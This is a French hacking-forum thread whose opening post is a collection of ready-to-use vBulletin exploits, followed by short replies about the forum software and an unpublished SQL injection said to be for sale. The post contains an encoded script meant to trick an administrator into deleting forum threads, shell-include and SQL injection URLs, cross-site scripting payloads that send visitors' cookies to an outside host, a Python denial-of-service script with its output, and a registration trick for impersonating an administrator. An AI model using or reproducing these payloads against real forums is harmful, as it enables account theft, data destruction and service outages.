    data:text/html;base64,PHNjcmlwdD5ldmFsKCJ2PSdodHRwOi8vbG9jYWxob3N0L3ZCL2
    1vZGNwL3RocmVhZC5waHA/ZG89Jzt1PSdhcHBsaWNhdGlvbi94L3dy1mb3JtLXVybGVuY2
    9kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz1uZXcgWE1MSH
    R0cFJlcXVlc3QoKTtyZWcub3BlbignR0VUJyx2KydwcnVuZScsZmFsc2UpO3JlZy5zZW5kKG
    51bGwpO3I9cmVnLnJlc3BvbnNlVGV4dDtoPScmYWRtaW5oYXNoPScrci5zdWJzdHIoci5pbm
    RleE9mKCdoYXNoXCInKSsxMywzMik7dG89JyZzZWN1cml0eXRva2VuPScrci5zdWJzdHIoci
    5pbmRleE9mKCd0b2tlblwiJykrMTQsNDApO3M9J3RocmVhZFsnO3QyPXMrJ29yaWdpbmFsZG
    F5c29sZGVyXT0wJicrcysnb3JpZ2luYWxkYXlzbmV3ZXJdPTAmJytzKydsYXN0ZGF5c29sZG
    VyXT0wJicrcysnbGFzdGRheXNuZlcl09MCYnK3MrJ3JlcGxpZXNsZWFzdF09MCYnK3MrJ3
    JlcGxpZXNtb3N0XT0tMSYnK3MrJ3ZpZzbGVhc3RdPTAmJytzKyd2aWV3c21vc3RdPS0xJi
    crcysnaXNzdGlja3ldPS0xJicrcysnc3RhdGVdPWFueSYnK3MrJ3N0YXR1c109YW55Jicrcy
    snZm9ydW1pZF09LTEmJytzKydwb3N0ZWR1c2VyXT0mJytzKyd0aXRsZWNvbnRhaW5zXT0mJy
    tzKydzdWJmb3J1bXNdPTEmdHlwZT1wcnVuZSZkbz1kb3RocmVhZHMnK2grdG87cjI9bmV3IF
    hNTEh0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRzJyxmYWxzZSk7cj
    Iuc2V0UmVWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVWVzdEhlYWRlcihjLH
    UpO3IyLnNlbmQodDIpO3g9cjIucmVzcG9uc2VUZXh0O3QyPSdkbz1kb3RocmVhZHNhbGwmdH
    lwZT1wcnVuZSYnK2grdG8rJyZjcml0ZXJpYT0nK2VzY2FwZSgoeC5zdWJzdHIoeC5pbmRleE
    9mKCdyaWEnKSsxMiw3NDcpKS5yZXBsYWNlKC8mcXVvdDsvZywnXCInKSk7cjI9bmV3IFhNTE
    h0dHBSZXF1ZXN0KCk7cjIub3BlbignUE9TVCcsdisnZG90aHJlYWRzYWxsJyxmYWxzZSk7cj
    Iuc2V0UmVWVzdEhlYWRlcihkLHQyLmxlbmd0aCk7cjIuc2V0UmVWVzdEhlYWRlcihjLH
    UpO3IyLnNlbmQodDIpOyIpOzwvc2NyaXB0Pg==
    
    In order to exploit, just get an admin/moderator to click the link.
    RFI ====> vBulletin v3.6.5

    Code:
    vBulletin v3.6.5
    
    Dork : "Powered by vBulletin v3.6.5. Copyright ©2000 - 2007 "
    
    -----------------------------------
    
    Exploits :
    
    Http://WWW.Victim.Com/vb/includes/functions.php?classfile=[Shell-Attack]
    
    Http://WWW.Victim.Com/vb/includes/functions_cron.php?nextitem=[Shell-Att
    
    ack]
    
    Http://WWW.Victim.Com/vb/includes/functions_forumdisplay.php?specialtemp
    
    lates=[Shell-Attack]
    vBulletin v 2.3 .* SQL Injection Vulnerability

    Code:
    www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid, '0000-0-0 ', version (), userid FROM calendar_events WHERE eventid = 14) order by eventdate
    vBulletin 3.0.0 XSS Vulnerability

    Code:
    3.0.0: search.php
    www.xhh777hhh.som/forumpath//search.php?do=process&showposts=0&query = <script> img = new Image (); img.src = «http://antichat.ru/cgi-bin/s. jpg? »+ document.cookie; </ script>
    3.0-3.0.4: forumdisplay.php
    www.xhh777hhh.som/forumpath/forumdisplay.php?GLOBALS [] = 1 & f = 2 & comma = ». System ( 'id').»
    3.0.3-3.0.9: XSS в статусе
    <body onLoad=img = new Image(); img.src = «http://antichat.ru/cgi-bin/s.jpg?»+document.cookie;>
    3.0.9 и 3.5.4: newthread.php
    www.site.com/forumpath/newthread.php?do=newthread&f=3&subject=1234&WYSIWYG_HTML =% 3Cp% 3E% 3C% 2Fp% 3E & s = & f = 3 & do = postthread & posthash = c8d3fe38b082b6d3381cbee17f1f1aca & poststarttime = '% 2Bimg = new Image (); img. src = «http://antichat.ru/cgi-bin/s.jpg?» + document.cookie;% 2B '& sbutton =% D1% EE% E7% E4% E0% F2% FC +% ED% EE% E2 % F3% FE +% F2% E5% EC% F3 & parseurl = 1 & disablesmilies = 1 & emailupdate = 3 & postpoll = yes & polloptions = 1234 & openclose = 1 & stickunstick = 1 & iconid = 0
    vBulletin v 4.0.1 XSS Vulnerability

    Code:
    Exploit: http://[HOST]/forum/calendar.php="<script>alert("! XSS!");</script>
    vBulletin Version 4.0.2 Xss Vulnerability

    Code:
    http://127.0.0.1/upload/calendar.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/faq.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/forum.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/usercp.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/subscription.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/showthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/showgroups.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/sendmessage.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/search.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/register.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/profile.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/private.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/online.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/newthread.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/misc.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/memberlist.php?=>"'><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/member.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/inlinemod.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/index.php/>"><ScRiPt>alert(213771818860)</ScRiPt>
    http://127.0.0.1/upload/forumdisplay.php?acuparam=>"><ScRiPt>alert(213771818860)</ScRiP
    vBulletin Version 3.8.4 File Include Vulnerability

    Code:
    [http//www.site.com/[path]/vbseo_sitemap/vbseo_sitemap_functions.php?=[LFI]
    http//www.site.com/[path]/includes/functions.php?$classfile=[shell].txt?
    Vbulletin 4.0.2 XSS Vulnerability

    Code:
    www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert('xss');</script>
    www.site.com/path/search.php?search_type=1&contenttype=vBBlog_BlogEntry&query="><script>alert(document.cookie);</script>
    vBulletin "Cyb - Advanced Forum Statistics" DOS

    Code:
    import urllib,urllib2,re
    print "####################################"
    print "#[+]ICW 0-day Domain Crasher #"
    print "#[+] Exploit found by Yash [ICW] #"
    print "#[+] Exploit Coded by FB1H2S [ICW] #"
    print "#[+] Care-Taker d4rk-blu [ICW] #"
    print "#[+] Indian Cyber Warriors #"
    print "####################################\n"
    print "Enter Domain Adress:"
    domain=raw_input("[+]Ex: www.site.com<http://www.site.com>:")
    url ='http://'+domain+'/misc.php?show=latestposts&vsacb_resnr=10000000'
    res = urllib.urlopen(url).read(200)
    phpmem= re.findall('of (.*?)bytes.*?',res)
    bytes=int(phpmem[0])
    mb=bytes/1048576
    print '[+]Server php memmory is:'+str(mb)+' MB'
    print "[+]Enter the No of request you wann send:"
    kill=raw_input("Some 20-30 will be enough:")
    try:
    for i in range(1,int(kill)):
    print i
    res1 = urllib.urlopen(url).read(200)
    print res1
    except(IOError),msg: print "Server will be FCUK'ed by now"
     
     
    ################################################################
    C:\Python25>python vbexploit.py
    ####################################
    #[+]ICW 0-day Domain Crasher #
    #[+] Bug found by Yash [ICW] #
    #[+] Exploit Coded by FB1H2S [ICW] #
    #[+] Care-Taker d4rk-blu [ICW] #
    #[+] Indian Cyber Warriors #
    ####################################
     
    Enter Domain Adress:
    [+]Ex: www.site.com<http://www.site.com>: sitehere
    [+]Server php memmory is:32 MB
    [+]Enter the No of request you wann send:20
    vBulletin v4.0.4 adserver Javascript (forumdisplay.php) Code Execution

    Code:
    http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
    http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
    http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
    http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
    http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart
    vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability

    Code:
    1 > Go to Http://[localhost]/path/register.php
    2 > Assume that forum admin user name is ADMIN
    3 > Type this at User Name ===> ADMIN�
    4 > � is an ASCII Code
    5 > And complete the other parameters
    6 > Then click on Complete Registrarion
    7 > Now you see that your user name like admin user name
    Thread Original : Le Mien sur ABH

    Voila ^^
    Dernière modification par xConsoLe, 06 septembre 2011, 15h52.

  • #2
    Bon, je l'ai déplacé en Level IV : tu comprendras aisément pourquoi^^

    Et en même temps, un petit +11, t'es à 42

    Grand merci pour ce post.

    Par hasard, n'aurais-tu pas le même genre de banque de scripts pour d'autres types de forums ? Pour des CMS aussi (genre Joomla^^).
    sigpic

    Cyprium Download Link

    Plus j'étudie plus j'me rends compte que je n'sais rien.

    †|

    Commentaire


    • #3
      Pour des CMS aussi (genre Joomla^^)
      Toi j'te vois venir ^^
      mactux †|

      Le savoir n'est réel que s'il est partagé

      Commentaire


      • #4
        On trouve souvent des sites fait avec vBulletin ?
        Je ne connais pas du tout vBulletin ... c'est semble t-il un shareware pour web site, non ?! Un peux comme drupal ?

        ps : c'est pour pas mourir idiot ^^
        Dernière modification par Yarflam, 04 décembre 2012, 04h04.
        ~ Yarflam ~

        ❉ L'Univers se dirige vers son ultime perfection ❉

        Commentaire


        • #5
          C'est drôle, on parle jamais de "shareware". Je n'ai vu ça que dans les tests de C2i/B2i et quelques sites à la con.
          Bref, c'est ce que l'on appelle un CMS, je te laisse google ça

          Commentaire


          • #6
            C'est assez oublié le terme shareware, oui Il est très utilisé sur des sites comme 01net - des plateformes de téléchargement légales ... que la moitié des gens n'utilisent plus depuis l'ère du torrent.

            Merci pour ces renseignements !
            Dernière modification par Yarflam, 07 décembre 2012, 22h37.
            ~ Yarflam ~

            ❉ L'Univers se dirige vers son ultime perfection ❉

            Commentaire


            • #7
              Avis aux amateurs d'audit ; toutes les bétas 5 de Vbulletin ont une injection SQL.

              En revanche je ne vois pas tellement l'intérêt de ce genre de "collection" sinon incité à aller tester les exploits sans les comprendre.

              Commentaire


              • #8
                Oh merde ! Je savais pas ! Un link ?!! On pensait justement la mettre la v5b Et on avait pas trouvé d'exploit dans les DBs !
                sigpic

                Cyprium Download Link

                Plus j'étudie plus j'me rends compte que je n'sais rien.

                †|

                Commentaire


                • #9
                  Envoyé par SAKAROV Voir le message
                  Oh merde ! Je savais pas ! Un link ?!! On pensait justement la mettre la v5b Et on avait pas trouvé d'exploit dans les DBs !
                  L'exploit n'est pas public, tu peux le trouver en vente un peu partout, ou directement en fouillant le code source.

                  Commentaire


                  • #10
                    C'est le Problème des Black ( je parle des hackers et non des hommes black ) les meilleurs choses sont privates , après bon courage pour fouillé le code source , mais il y a plusieurs forum pour cassé les privates mais ils sont caché (enfin ils n'aiment pas avoir beaucoup de monde quoi , ils préfèrent la qualité que la quantité
                    sigpic

                    Commentaire

                    Chargement...
                    X